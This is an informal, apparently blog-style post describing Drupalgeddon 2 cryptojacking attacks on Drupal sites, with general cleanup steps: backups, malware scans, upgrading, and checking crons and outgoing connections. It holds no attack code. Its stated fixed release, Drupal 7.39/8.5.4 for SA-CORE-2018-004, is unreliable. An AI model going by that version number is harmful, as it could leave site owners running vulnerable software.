Attackers are exploiting Drupalgeddon 2 critical vulnerability in Drupal to compromise systems & secretly turn them into malicious cryptocurrency mining machines like cryptojacking malware, mine for Monero.
The only side effects a victim might notice is that their system is running slower or doing more work than usual.
Still most of the drupal sites those are not upgraded to with the patch are having the issue..
The worst case would be rebuilding your servers, Well you will notified by your hosting providers if you are on shared hosting and asked you to fix it because they have their AUP violations rules ;)
So, Adding the security patch and cleaning up system would be task if at all you don't choose to rebuild servers..
Here we go, with understanding and cleaning
Remote Code Execution - SA-CORE-2018-004
Fix for this remote code execution vulnerability was released in Drupal - 7.39/8.5.4
Check and keep the backup of the drupal site, obviously hosting provider and we have a backup for atleast a month or 3 months. >Replicate the site on different server with backup and keep it aside..
In parallel to above step, Get one of the best anti-malware tools and perform scan on server, specifically for remote code execution like BitDefender. Else if you have any penetration tools could be used for scanning.
Upgrade the drupal to the latest version Drupal - 7.39/8.5.4..!!
- Cleanup Decision would be made based on the result of the scan..?
- Ideally if you see, less amount of vulnerable files the delete those..
- Particularly should be checked for php5 files, any crons included on crontabs or any perl scripts running automatically such things should be stopped..
Find out any outgoing request going from the server, if at all any suspicious url / activity is seen kill those, if they are initiated again, find for the ones which are initiating these tasks and kill those..
That's it.. If you are not seeing any activity, site is safe.. Get the penetration tests in a scheduled manner, so that if any other comes that could be captured and easy to fix it..
Bad case here would be, if you are still seeing outgoing activity from your server.. then rebuilding the servers is the option.